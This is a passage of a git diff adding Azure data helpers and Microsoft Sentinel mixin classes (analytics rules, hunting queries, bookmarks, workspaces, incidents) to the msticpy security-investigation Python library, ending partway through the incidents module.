+            except IndexError as idx_err:
+                raise MsticpyResourceException(
+                    "Provided Resource Provider isn't in the correct format.",
+                    "It should look like: NAMESPACE/SERVICE_NAME",
+                ) from idx_err
+        else:
+            raise ValueError(
+                "Please provide an resource ID or resource provider namespace"
+            )
+
+        # Get list of API versions for the service
+        try:
+            provider = self.resource_client.providers.get(namespace)  # type: ignore
+        except AttributeError:
+            self._legacy_auth("resource_client", sub_id)
+            provider = self.resource_client.providers.get(namespace)  # type: ignore
+
+        resource_types = next(
+            (t for t in provider.resource_types if t.resource_type == service), None
+        )
+
+        # Get first API version that isn't in preview
+        if not resource_types:
+            raise MsticpyResourceException("Resource provider not found")
+
+        api_version = [
+            v for v in resource_types.api_versions if "preview" not in v.lower()
+        ]
+        if api_version is None or not api_version:
+            api_ver = resource_types.api_versions[0]
+        else:
+            api_ver = api_version[0]
+        return str(api_ver)
+
+    def get_network_details(
+        self, network_id: str, sub_id: str
+    ) -> Tuple[pd.DataFrame, pd.DataFrame]:
+        """
+        Return details related to an Azure network interface and associated NSG.
+
+        Parameters
+        ----------
+        network_id: str
+            The ID of the network interface to return details on
+        sub_id: str
+            The subscription ID that the network interface is part of
+
+        Returns
+        -------
+        details: dict
+            A dictionary of items related to the network interface
+
+        """
+        # Check if connection and client required are already present
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+
+        self._check_client("network_client", sub_id)
+
+        # Get interface details and parse relevent elements into a dataframe
+        try:
+            details = self.network_client.network_interfaces.get(  # type: ignore
+                network_id.split("/")[4], network_id.split("/")[8]
+            )
+        except AttributeError:
+            self._legacy_auth("network_client", sub_id)
+            details = self.network_client.network_interfaces.get(  # type: ignore
+                network_id.split("/")[4], network_id.split("/")[8]
+            )
+
+        ips = []
+        for ip in details.ip_configurations:  # pylint: disable=invalid-name
+            ip_details = attr.asdict(
+                InterfaceItems(
+                    network_id,
+                    ip.private_ip_address,
+                    ip.private_ip_allocation_method,
+                    ip.public_ip_address.ip_address,
+                    ip.public_ip_address.public_ip_allocation_method,
+                    ip.application_security_groups,
+                    ip.subnet.name,
+                    ip.subnet.network_security_group,
+                    ip.subnet.route_table,
+                )
+            )
+            ips.append(ip_details)
+
+        ip_df = pd.DataFrame(ips)
+
+        nsg_df = pd.DataFrame()
+        if details.network_security_group is not None:
+            # Get NSG details and parse relevent elements into a dataframe
+            nsg_details = self.network_client.network_security_groups.get(  # type: ignore
+                details.network_security_group.id.split("/")[4],
+                details.network_security_group.id.split("/")[8],
+            )
+            nsg_rules = []
+            for nsg in nsg_details.default_security_rules:
+                rules = attr.asdict(
+                    NsgItems(
+                        nsg.name,
+                        nsg.description,
+                        nsg.protocol,
+                        nsg.direction,
+                        nsg.source_port_range,
+                        nsg.destination_port_range,
+                        nsg.source_address_prefix,
+                        nsg.destination_address_prefix,
+                        nsg.access,
+                    )
+                )
+                nsg_rules.append(rules)
+
+            nsg_df = pd.DataFrame(nsg_rules)
+
+        return ip_df, nsg_df
+
+    def get_metrics(  # pylint: disable=too-many-locals, too-many-arguments, too-many-branches
+        self,
+        metrics: str,
+        resource_id: str,
+        sub_id: str,
+        sample_time: str = "hour",
+        start_time: int = 30,
+    ) -> Dict[str, pd.DataFrame]:
+        """
+        Return specified metrics on Azure Resource.
+
+        Parameters
+        ----------
+        metrics: str
+            A string list of metrics you wish to collect
+            (https://docs.microsoft.com/en-us/azure/azure-monitor/platform/metrics-supported)
+        resource_id: str
+            The resource ID of the resource to collet the metrics from
+        sub_id: str
+            The subscription ID that the resource is part of
+        sample_time: str (Optional)
+            You can select to collect the metrics every hour of minute - default is hour
+            Accepted inputs = 'hour' or 'minute'
+        start_time: int (Optional)
+            The number of days prior to today to collect metrics for, default is 30
+
+        Returns
+        -------
+        results: dict
+            A Dictionary of DataFrames containing the metrics details
+
+        """
+        if sample_time.casefold().startswith("h"):
+            interval = "PT1H"
+        elif sample_time.casefold().startswith("m"):
+            interval = "PT1M"
+        else:
+            raise ValueError(
+                "invalid value for sample_time - specify 'hour', or 'minute'"
+            )
+
+        # Check if connection and client required are already present
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+
+        self._check_client("monitoring_client", sub_id)
+
+        # Get metrics in one hour chunks for the last 30 days
+        start = datetime.datetime.now().date()
+        end = start - datetime.timedelta(days=start_time)
+
+        try:
+            mon_details = self.monitoring_client.metrics.list(  # type: ignore
+                resource_id,
+                timespan=f"{end}/{start}",
+                interval=interval,
+                metricnames=f"{metrics}",
+                aggregation="Total",
+            )
+        except AttributeError:
+            self._legacy_auth("monitoring_client", sub_id)
+            mon_details = self.monitoring_client.metrics.list(  # type: ignore
+                resource_id,
+                timespan=f"{end}/{start}",
+                interval=interval,
+                metricnames=f"{metrics}",
+                aggregation="Total",
+            )
+        results = {}
+        # Create a dict of all the results returned
+        for metric in mon_details.value:
+            times = []
+            output = []
+            for time in metric.timeseries:
+                for data in time.data:
+                    times.append(data.time_stamp)
+                    output.append(data.total)
+            details = pd.DataFrame({"Time": times, "Data": output})
+            details.replace(np.nan, 0, inplace=True)
+            results[metric.name.value] = details
+        return results
+
+    # pylint: enable=too-many-locals, too-many-arguments
+
+    def _get_compute_state(
+        self, resource_id: str, sub_id: str
+    ) -> VirtualMachineInstanceView:
+        """
+        Return the details on a Virtual Machine instance.
+
+        Parameters
+        ----------
+        resource_id: str
+            The Resource ID of the Virtual Machine
+        sub_id: str
+            The Subscription the Virtual Machine is part of
+
+        Returns
+        -------
+        instance_details: VirtualMachineInstanceView
+            The details of the Virtual Machine
+
+        """
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+
+        self._check_client("compute_client", sub_id)
+
+        # Parse the Resource ID to extract Resource Group and Resource Name
+        r_details = resource_id.split("/")
+        r_group = r_details[r_details.index("resourceGroups") + 1]
+        name = r_details[r_details.index("virtualMachines") + 1]
+
+        # Get VM instance details and return them
+        try:
+            instance_details = self.compute_client.virtual_machines.instance_view(  # type: ignore
+                r_group, name
+            )
+        except AttributeError:
+            self._legacy_auth("compute_client", sub_id)
+            instance_details = self.compute_client.virtual_machines.instance_view(  # type: ignore
+                r_group, name
+            )
+
+        return instance_details
+
+    def _check_client(self, client_name: str, sub_id: str = None):
+        """
+        Check required client is present, if not create it.
+
+        Parameters
+        ----------
+        client_name : str
+            The name of the client to be checked.
+        sub_id : str, optional
+            The subscription ID for the client to connect to, by default None
+
+        """
+        client = _CLIENT_MAPPING[client_name]
+        if getattr(self, client_name) is None:
+            if sub_id is None:
+                setattr(
+                    self,
+                    client_name,
+                    client(
+                        self.credentials.modern,  # type: ignore
+                        base_url=self.endpoints.resource_manager,
+                        credential_scopes=[self.az_cloud_config.token_uri],
+                    ),
+                )
+            else:
+                setattr(
+                    self,
+                    client_name,
+                    client(
+                        self.credentials.modern,  # type: ignore
+                        sub_id,
+                        base_url=self.endpoints.resource_manager,
+                        credential_scopes=[self.az_cloud_config.token_uri],
+                    ),
+                )
+
+        if getattr(self, client_name) is None:
+            raise CloudError("Could not create client")
+
+    def _legacy_auth(self, client_name: str, sub_id: str = None):
+        """
+        Create client with v1 authentication token.
+
+        Parameters
+        ----------
+        client_name : str
+            The name of the client to be checked.
+        sub_id : str, optional
+            The subscription ID for the client to connect to, by default None
+
+        """
+        client = _CLIENT_MAPPING[client_name]
+        if sub_id is None:
+            setattr(
+                self,
+                client_name,
+                client(
+                    self.credentials.legacy,  # type: ignore
+                    base_url=self.endpoints.resource_manager,
+                    credential_scopes=[self.az_cloud_config.token_uri],
+                ),
+            )
+        else:
+            setattr(
+                self,
+                client_name,
+                client(
+                    self.credentials.legacy,  # type: ignore
+                    sub_id,
+                    base_url=self.endpoints.resource_manager,
+                    credential_scopes=[self.az_cloud_config.token_uri],
+                ),
+            )
+
+
+def get_api_headers(token: str) -> Dict:
+    """
+    Return authorization header with current token.
+
+    Parameters
+    ----------
+    token : str
+        Azure auth token.
+
+    Returns
+    -------
+    Dict
+        A dictionary of headers to be used in API calls.
+
+    """
+    return {
+        "Authorization": f"Bearer {token}",
+        "Content-Type": "application/json",
+    }
+
+
+def get_token(credential: AzCredentials) -> str:
+    """
+    Extract token from a azure.identity object.
+
+    Parameters
+    ----------
+    credential : AzCredentials
+        Azure OAuth credentials.
+
+    Returns
+    -------
+    str
+        A token to be used in API calls.
+
+    """
+    token = credential.modern.get_token(AzureCloudConfig().token_uri)
+    return token.token
diff --git a/msticpy/data/azure/sentinel_analytics.py b/msticpy/data/azure/sentinel_analytics.py
new file mode 100644
index 000000000..081b11699
--- /dev/null
+++ b/msticpy/data/azure/sentinel_analytics.py
@@ -0,0 +1,306 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mixin Classes for Sentinel Analytics Features."""
+from uuid import UUID, uuid4
+
+import pandas as pd
+import httpx
+from IPython.display import display
+
+from azure.common.exceptions import CloudError
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyUserError
+from .azure_data import get_api_headers
+from .sentinel_utils import _build_sent_data
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class SentinelHuntingMixin:
+    """Mixin class for Sentinel Hunting feature integrations."""
+
+    def list_hunting_queries(self) -> pd.DataFrame:
+        """
+        Return all hunting queries in a Microsoft Sentinel workspace.
+
+        Returns
+        -------
+        pd.DataFrame
+            A table of the hunting queries.
+
+        """
+        saved_query_df = self._list_items(  # type: ignore
+            item_type="alert_rules", api_version="2017-04-26-preview"
+        )
+        return saved_query_df[
+            saved_query_df["properties.Category"] == "Hunting Queries"
+        ]
+
+    get_hunting_queries = list_hunting_queries
+
+
+class SentinelAnalyticsMixin:
+    """Mixin class for Sentinel Analytics feature integrations."""
+
+    def list_alert_rules(self) -> pd.DataFrame:
+        """
+        Return all Microsoft Sentinel alert rules for a workspace.
+
+        Returns
+        -------
+        pd.DataFrame
+            A table of the workspace's alert rules.
+
+        """
+        return self._list_items(item_type="alert_rules")  # type: ignore
+
+    def _get_template_id(
+        self,
+        template: str,
+    ) -> str:
+        """
+        Get an analytic template ID.
+
+        Parameters
+        ----------
+        template : str
+            Template ID or Name
+        res_id : str
+            Sentinel workspace to get template from
+
+        Returns
+        -------
+        str
+            Template ID
+
+        Raises
+        ------
+        MsticpyUserError
+            If template not found or multiple templates found.
+
+        """
+        try:
+            UUID(template)
+            return template
+        except ValueError as template_name:
+            templates = self.list_analytic_templates()
+            template_details = templates[
+                templates["properties.displayName"].str.contains(template)
+            ]
+            if len(template_details) > 1:
+                display(template_details[["name", "properties.displayName"]])
+                raise MsticpyUserError(
+                    "More than one template found, please specify by GUID"
+                ) from template_name
+            if not isinstance(template_details, pd.DataFrame) or template_details.empty:
+                raise MsticpyUserError(
+                    f"Template {template_details} not found"
+                ) from template_name
+            return template_details["name"].iloc[0]
+
+    def create_analytic_rule(  # pylint: disable=too-many-arguments, too-many-locals
+        self,
+        template: str = None,
+        name: str = None,
+        enabled: bool = True,
+        query: str = None,
+        query_frequency: str = "PT5H",
+        query_period: str = "PT5H",
+        severity: str = "Medium",
+        suppression_duration: str = "PT1H",
+        suppression_enabled: bool = False,
+        trigger_operator: str = "GreaterThan",
+        trigger_threshold: int = 0,
+        description: str = None,
+        tactics: list = None,
+    ):
+        """
+        Create a Sentinel Analytics Rule.
+
+        Parameters
+        ----------
+        template : str, optional
+            The GUID or name of a templated to create the analytic from, by default None
+        name : str, optional
+            The name to give the analytic, by default None
+        enabled : bool, optional
+            Whether you want the analytic to be enabled once deployed, by default True
+        query : str, optional
+            The KQL query string to use in the anlaytic, by default None
+        query_frequency : str, optional
+            How often the query should run in ISO8601 format, by default "PT5H"
+        query_period : str, optional
+            How far back the query should look in ISO8601 format, by default "PT5H"
+        severity : str, optional
+            The severity to raise incidents as, by default "Medium"
+            Options are; Informational, Low, Medium, or High
+        suppression_duration : str, optional
+            How long to suppress duplicate alerts in ISO8601 format, by default "PT1H"
+        suppression_enabled : bool, optional
+            Whether you want to suppress duplicates, by default False
+        trigger_operator : str, optional
+            The operator for the trigger, by default "GreaterThan"
+        trigger_threshold : int, optional
+            The threshold of events required to create the incident, by default 0
+        description : str, optional
+            A description of the analytic, by default None
+        tactics : list, optional
+            A list of MITRE ATT&CK tactics related to the analytic, by default None
+
+        Raises
+        ------
+        MsticpyUserError
+            If template provided isn't found.
+        CloudError
+            If the API returns an error.
+
+        """
+        if template:
+            template_id = self._get_template_id(template)
+            templates = self.list_analytic_templates()
+            template_details = templates[templates["name"] == template_id].iloc[0]
+            name = template_details["properties.displayName"]
+            query = template_details["properties.query"]
+            query_frequency = template_details["properties.queryFrequency"]
+            query_period = template_details["properties.queryPeriod"]
+            severity = template_details["properties.severity"]
+            trigger_operator = template_details["properties.triggerOperator"]
+            trigger_threshold = template_details["properties.triggerThreshold"]
+            description = template_details["properties.description"]
+            tactics = (
+                template_details["properties.tactics"]
+                if not pd.isna(template_details["properties.tactics"])
+                else []
+            )
+
+        if not tactics:
+            tactics = []
+
+        if not name:
+            raise MsticpyUserError(
+                "Please specify either a template ID or analytic details."
+            )
+
+        rule_id = uuid4()
+        analytic_url = self.sent_urls["alert_rules"] + f"/{rule_id}"  # type: ignore
+        data_items = {
+            "displayName": name,
+            "query": query,
+            "queryFrequency": query_frequency,
+            "queryPeriod": query_period,
+            "severity": severity,
+            "suppressionDuration": suppression_duration,
+            "suppressionEnabled": str(suppression_enabled).lower(),
+            "triggerOperator": trigger_operator,
+            "triggerThreshold": trigger_threshold,
+            "description": description,
+            "tactics": tactics,
+            "enabled": str(enabled).lower(),
+        }
+        data = _build_sent_data(data_items, props=True)
+        data["kind"] = "Scheduled"
+        params = {"api-version": "2020-01-01"}
+        response = httpx.put(
+            analytic_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(data),
+        )
+        if response.status_code != 201:
+            raise CloudError(response=response)
+        print("Analytic Created.")
+
+    def _get_analytic_id(self, analytic: str) -> str:
+        """
+        Get the GUID of an analytic rule.
+
+        Parameters
+        ----------
+        analytic : str
+            The GUID or name of the analytic
+
+        Returns
+        -------
+        str
+            The analytic GUID
+
+        Raises
+        ------
+        MsticpyUserError
+            If analytic not found or multiple matching analytics found
+
+        """
+        try:
+            UUID(analytic)
+            return analytic
+        except ValueError as analytic_name:
+            analytics = self.list_analytic_rules()
+            analytic_details = analytics[
+                analytics["properties.displayName"].str.contains(analytic)
+            ]
+            if len(analytic_details) > 1:
+                display(analytic_details[["name", "properties.displayName"]])
+                raise MsticpyUserError(
+                    "More than one analytic found, please specify by GUID"
+                ) from analytic_name
+            if not isinstance(analytic_details, pd.DataFrame) or analytic_details.empty:
+                raise MsticpyUserError(
+                    f"Analytic {analytic_details} not found"
+                ) from analytic_name
+            return analytic_details["name"].iloc[0]
+
+    def delete_analytic_rule(
+        self,
+        analytic_rule: str,
+    ):
+        """
+        Delete a deployed Analytic rule from a Sentinel workspace.
+
+        Parameters
+        ----------
+        analytic_rule : str
+            The GUID or name of the analytic.
+
+        Raises
+        ------
+        CloudError
+            If the API returns an error.
+
+        """
+        analytic_id = self._get_analytic_id(analytic_rule)
+        analytic_url = self.sent_urls["alert_rules"] + f"/{analytic_id}"  # type: ignore
+        params = {"api-version": "2020-01-01"}
+        response = httpx.delete(
+            analytic_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+        )
+        if response.status_code != 200:
+            raise CloudError(response=response)
+        print("Analytic Deleted.")
+
+    def list_analytic_templates(self) -> pd.DataFrame:
+        """
+        List Analytic Templates.
+
+        Returns
+        -------
+        pd.DataFrame
+            A DataFrame containing the analytics templates
+
+        Raises
+        ------
+        CloudError
+            If a valid result is not returned.
+
+        """
+        return self._list_items(item_type="alert_template")  # type: ignore
+
+    get_alert_rules = list_alert_rules
+    list_analytic_rules = list_alert_rules
+    get_analytic_rules = list_alert_rules
diff --git a/msticpy/data/azure/sentinel_bookmarks.py b/msticpy/data/azure/sentinel_bookmarks.py
new file mode 100644
index 000000000..c707a9e68
--- /dev/null
+++ b/msticpy/data/azure/sentinel_bookmarks.py
@@ -0,0 +1,168 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mixin Classes for Sentinel Bookmark Features."""
+from typing import Dict, List, Union
+from uuid import UUID, uuid4
+
+import pandas as pd
+import httpx
+from IPython.display import display
+
+from azure.common.exceptions import CloudError
+
+from ..._version import VERSION
+from .azure_data import get_api_headers
+from .sentinel_utils import _build_sent_data
+from ...common.exceptions import MsticpyUserError
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class SentinelBookmarksMixin:
+    """Mixin class with Sentinel Bookmark integrations."""
+
+    def list_bookmarks(self) -> pd.DataFrame:
+        """
+        Return a list of Bookmarks from a Sentinel workspace.
+
+        Returns
+        -------
+        pd.DataFrame
+            A set of bookmarks.
+
+        """
+        return self._list_items(item_type="bookmarks")  # type: ignore
+
+    def create_bookmark(
+        self,
+        name: str,
+        query: str,
+        results: str = None,
+        notes: str = None,
+        labels: List[str] = None,
+    ):
+        """
+        Create a bookmark in the Sentinel Workpsace.
+
+        Parameters
+        ----------
+        name : str
+            The name of the bookmark to use
+        query : str
+            The KQL query for the bookmark
+        results : str, optional
+            The results of the query to include with the bookmark, by default None
+        notes : str, optional
+            Any notes you want associated with the bookmark, by default None
+        labels : List[str], optional
+            Any labels you want associated with the bookmark, by default None
+
+        Raises
+        ------
+        CloudError
+            If API retunrs an error.
+
+        """
+        # Generate or use resource ID
+        bkmark_id = str(uuid4())
+        bookmark_url = self.sent_urls["bookmarks"] + f"/{bkmark_id}"  # type: ignore
+        data_items = {
+            "displayName": name,
+            "query": query,
+        }  # type: Dict[str, Union[str, List]]
+        if results:
+            data_items["queryResults"] = results
+        if notes:
+            data_items["notes"] = notes
+        if labels:
+            data_items["labels"] = labels
+        data = _build_sent_data(data_items, props=True)
+        params = {"api-version": "2020-01-01"}
+        response = httpx.put(
+            bookmark_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(data),
+        )
+        if response.status_code == 200:
+            print("Bookmark created.")
+        else:
+            raise CloudError(response=response)
+
+    def delete_bookmark(
+        self,
+        bookmark: str,
+    ):
+        """
+        Delete the selected bookmark.
+
+        Parameters
+        ----------
+        bookmark: str, optional
+            The name or GIUD of the bookmark to delete.
+
+        Raises
+        ------
+        CloudError
+            If the API returns an error.
+
+        """
+        bookmark_id = self._get_bookmark_id(bookmark)
+        bookmark_url = self.sent_urls["bookmarks"] + f"/{bookmark_id}"  # type: ignore
+        params = {"api-version": "2020-01-01"}
+        response = httpx.delete(
+            bookmark_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+        )
+        if response.status_code == 200:
+            print("Bookmark deleted.")
+        else:
+            raise CloudError(response=response)
+
+    def _get_bookmark_id(self, bookmark: str) -> str:
+        """
+        Get the ID of a bookmark.
+
+        Parameters
+        ----------
+        bookmark : str
+            GUID or name of a bookmark
+
+        Returns
+        -------
+        str
+            Bookmark GUID
+        Raises
+        ------
+        MsticpyUserError
+            If Bookmark not found or multiple matching bookmarks found.
+
+        """
+        try:
+            UUID(bookmark)
+            return bookmark
+        except ValueError as bkmark_name:
+            bookmarks = self.list_bookmarks()
+            filtered_bookmarks = bookmarks[
+                bookmarks["properties.displayName"].str.contains(bookmark)
+            ]
+            if len(filtered_bookmarks) > 1:
+                display(filtered_bookmarks[["name", "properties.displayName"]])
+                raise MsticpyUserError(
+                    "More than one incident found, please specify by GUID"
+                ) from bkmark_name
+            if (
+                not isinstance(filtered_bookmarks, pd.DataFrame)
+                or filtered_bookmarks.empty
+            ):
+                raise MsticpyUserError(
+                    f"Incident {bookmark} not found"
+                ) from bkmark_name
+            return filtered_bookmarks["name"].iloc[0]
+
+    get_bookmarks = list_bookmarks
diff --git a/msticpy/data/azure/sentinel_core.py b/msticpy/data/azure/sentinel_core.py
new file mode 100644
index 000000000..acc8695e6
--- /dev/null
+++ b/msticpy/data/azure/sentinel_core.py
@@ -0,0 +1,228 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Uses the Microsoft Sentinel APIs to interact with Microsoft Sentinel Workspaces."""
+from typing import Dict, List, Optional, Tuple
+
+import pandas as pd
+
+from ..._version import VERSION
+from .azure_data import AzureData, get_token
+from .sentinel_analytics import SentinelAnalyticsMixin, SentinelHuntingMixin
+from .sentinel_bookmarks import SentinelBookmarksMixin
+from .sentinel_incidents import SentinelIncidentsMixin
+from .sentinel_utils import _PATH_MAPPING, SentinelUtilsMixin, validate_res_id
+from .sentinel_watchlists import SentinelWatchlistsMixin
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class MicrosoftSentinel(
+    SentinelAnalyticsMixin,
+    SentinelHuntingMixin,
+    SentinelBookmarksMixin,
+    SentinelIncidentsMixin,
+    SentinelUtilsMixin,
+    SentinelWatchlistsMixin,
+    AzureData,
+):
+    """Class for returning key Microsoft Sentinel elements."""
+
+    def __init__(
+        self,
+        res_id: str = None,
+        connect: bool = False,
+        cloud: str = None,
+        sub_id: str = None,
+        res_grp: str = None,
+        ws_name: str = None,
+    ):
+        """
+        Initialize connector for Azure APIs.
+
+        Parameters
+        ----------
+        res_id : str, optional
+            Set the Sentinel workspace resource ID you want to use, if not specified
+            defaults will be looked for or details can be passed seperately with functions.
+        connect : bool, optional
+            Set true if you want to connect to API on initialization, by default False
+        cloud : str, optional
+            Specify cloud to use, overriding any configuration value.
+            Default is to use configuration setting or public cloud if no
+            configuration setting is available.
+        sub_id : str, optional
+            If not specifying a resource ID the Subscription ID of the Sentinel Workspace
+            by default None
+        res_grp : str, optional
+            If not specifying a resource ID the Resource Group name of the
+            Sentinel Workspace, by default None
+        ws_name : str, optional
+            If not specifying a resource ID the Workspace name of the
+            Sentinel Workspace, by default None
+
+        """
+        super().__init__(connect=connect, cloud=cloud)
+        self.config = None  # type: ignore
+        self.base_url = self.endpoints.resource_manager
+        self.default_subscription: Optional[str] = None
+        self.default_workspace: Optional[Tuple[str, str]] = None
+        res_id = res_id or self._get_default_workspace()
+        if not res_id:
+            res_id = self._build_sent_res_id(sub_id, res_grp, ws_name)
+        res_id = validate_res_id(res_id)
+        self.url = self._build_sent_paths(res_id, self.base_url)  # type: ignore
+        self.sent_urls = {
+            "bookmarks": self.url + _PATH_MAPPING["bookmarks"],
+            "incidents": self.url + _PATH_MAPPING["incidents"],
+            "alert_rules": self.url + _PATH_MAPPING["alert_rules"],
+            "watchlists": self.url + _PATH_MAPPING["watchlists"],
+        }
+
+    def connect(
+        self,
+        auth_methods: List = None,
+        tenant_id: str = None,
+        silent: bool = False,
+        **kwargs,
+    ):
+        """
+        Authenticate with the SDK & API.
+
+        Parameters
+        ----------
+        auth_methods : List, optional
+            list of preferred authentication methods to use, by default None
+        tenant_id : str, optional
+            Specify cloud tenant to use
+        silent : bool, optional
+            Set true to prevent output during auth process, by default False
+
+        """
+        if not tenant_id:
+            config = self._check_config(["tenant_id"])
+            tenant_id = config["tenant_id"]
+
+        super().connect(auth_methods=auth_methods, tenant_id=tenant_id, silent=silent)
+        if "token" in kwargs:
+            self.token = kwargs["token"]
+        else:
+            self.token = get_token(self.credentials)  # type: ignore
+
+        self.res_group_url = None
+        self.prov_path = None
+
+    def set_default_subscription(self, subscription_id: str):
+        """Set the default subscription to use to `subscription_id`."""
+        subs_df = self.get_subscriptions()
+        if subscription_id in subs_df["Subscription ID"].values:
+            self.default_subscription = subscription_id
+        else:
+            print(f"Subscription ID {subscription_id} not found.")
+            print(
+                f"Subscriptions found: {', '.join(subs_df['Subscription ID'].values)}"
+            )
+
+    def list_sentinel_workspaces(self, sub_id: str = None) -> Dict[str, str]:
+        """
+        Return a list of Microsoft Sentinel workspaces in a Subscription.
+
+        Parameters
+        ----------
+        sub_id : str
+            The subscription ID to get a list of workspaces from.
+            If not provided it will attempt to get sub_id from config files.
+
+        Returns
+        -------
+        Dict
+            A dictionary of workspace names and ids
+
+        """
+        # If a subscription ID isn't provided try and get one from config files.
+        sub_id = sub_id or self.default_subscription
+        if not sub_id:
+            config = self._check_config(["subscription_id"])
+            sub_id = config["subscription_id"]
+
+        print("Finding Microsoft Sentinel Workspaces...")
+        res = self.get_resources(sub_id=sub_id)  # type: ignore
+        # handle no results
+        if isinstance(res, pd.DataFrame) and not res.empty:
+            sentinel = res[
+                (res["resource_type"] == "Microsoft.OperationsManagement/solutions")
+                & (res["name"].str.startswith("SecurityInsights"))
+            ]
+            workspaces = []
+            for wrkspace in sentinel["resource_id"]:
+                res_details = self.get_resource_details(
+                    sub_id=sub_id, resource_id=wrkspace  # type: ignore
+                )
+                workspaces.append(res_details["properties"]["workspaceResourceId"])
+
+            workspaces_dict = {}
+            for wrkspace in workspaces:
+                name = wrkspace.split("/")[-1]
+                workspaces_dict[name] = wrkspace
+            return workspaces_dict
+
+        print(f"No Microsoft Sentinel workspaces in {sub_id}")
+        return {}
+
+    def set_default_workspace(
+        self, sub_id: Optional[str], workspace: Optional[str] = None
+    ):
+        """
+        Set the default workspace.
+
+        Parameters
+        ----------
+        sub_id : Optional[str], optional
+            Subscription ID containing the workspace. If not specified,
+            the subscription will be taken from the `default_subscription`
+            or from configuration.
+        workspace : Optional[str], optional
+            Name of the workspace, by default None.
+            If not specified and there is only one workspace in the
+            subscription, this will be set as the default.
+
+        """
+        sub_id = sub_id or self.default_subscription
+        workspaces = self.get_sentinel_workspaces(sub_id=sub_id)
+        if len(workspaces) == 1:
+            self.default_workspace = next(iter(workspaces.items()))
+        elif workspace in workspaces:
+            self.default_workspace = workspace, workspaces[workspace]
+
+    def _get_default_workspace(self):
+        """Return the default workspace ResourceID."""
+        if self.default_workspace:
+            return self.default_workspace[0]
+        return None
+
+    def list_data_connectors(self) -> pd.DataFrame:
+        """
+        List deployed data connectors.
+
+        Returns
+        -------
+        pd.DataFrame
+            A DataFrame containing the deployed data connectors
+
+        Raises
+        ------
+        CloudError
+            If a valid result is not returned.
+
+        """
+        return self._list_items(item_type="data_connectors")
+
+    # Get > List Aliases
+    get_sentinel_workspaces = list_sentinel_workspaces
+
+
+# Alias for old class name
+AzureSentinel = MicrosoftSentinel
diff --git a/msticpy/data/azure/sentinel_incidents.py b/msticpy/data/azure/sentinel_incidents.py
new file mode 100644
index 000000000..a693bc317
--- /dev/null
+++ b/msticpy/data/azure/sentinel_incidents.py
@@ -0,0 +1,473 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mixin Classes for Sentinel Incident Features."""
+from datetime import datetime
+from typing import Dict, List, Union
+from uuid import UUID, uuid4
+
+import pandas as pd
+import httpx
+from IPython.display import display
+
+from azure.common.exceptions import CloudError
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyUserError
+from .azure_data import get_api_headers
+from .sentinel_utils import _azs_api_result_to_df, _build_sent_data
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class SentinelIncidentsMixin:
+    """Mixin class for Sentinel Incidents feature integrations."""
+
+    def get_incident(
+        self,
+        incident: str,
+        entities: bool = False,
+        alerts: bool = False,
+        comments: bool = False,
+        bookmarks: bool = False,
+    ) -> pd.DataFrame:
+        """
+        Get details on a specific incident.
+
+        Parameters
+        ----------
+        incident : str
+            Incident ID GUID.
+        entities : bool, optional
+            If True include all entities in the response. Default is False.
+        alerts : bool, optional
+            If True include all alerts in the response. Default is False.
+        comments: bool, optional
+             If True include all comments in the response. Default is False.
+        bookmarks: bool, optional
+             If True include all bookmarks in the response. Default is False.
+
+        Returns
+        -------
+        pd.DataFrame
+            Table containing incident details.
+
+        Raises
+        ------
+        CloudError
+            If incident could not be retrieved.
+
+        """
+        incident_id = self._get_incident_id(incident)
+        incident_url = self.sent_urls["incidents"] + f"/{incident_id}"  # type: ignore
+        response = self._get_items(incident_url)  # type: ignore
+        if response.status_code != 200:
+            raise CloudError(response=response)
+
+        incident_df = _azs_api_result_to_df(response)
+
+        if entities:
+            incident_df["Entities"] = [self.get_entities(incident_id)]
+
+        if alerts:
+            incident_df["Alerts"] = [self.get_incident_alerts(incident_id)]
+
+        if comments:
+            incident_df["Bookmarks"] = [self.get_incident_comments(incident_id)]
+
+        if bookmarks:
+            incident_df["Bookmarks"] = [self.get_incident_bookmarks(incident_id)]
+
+        return incident_df
+
+    def get_entities(self, incident: str) -> list:
+        """
+        Get the entities from an incident.
+
+        Parameters
+        ----------
+        incident : str
+            Incident GUID or Name .
+
+        Returns
+        -------
+        list
+            A list of entities.
+
+        """
+        incident_id = self._get_incident_id(incident)
+        entities_url = self.sent_urls["incidents"] + f"/{incident_id}/entities"  # type: ignore
+        ent_parameters = {"api-version": "2019-01-01-preview"}
+        ents = httpx.post(
+            entities_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=ent_parameters,
+        )
+        return (
+            [(ent["kind"], ent["properties"]) for ent in ents.json()["entities"]]
+            if ents.status_code == 200
+            else []
+        )
+
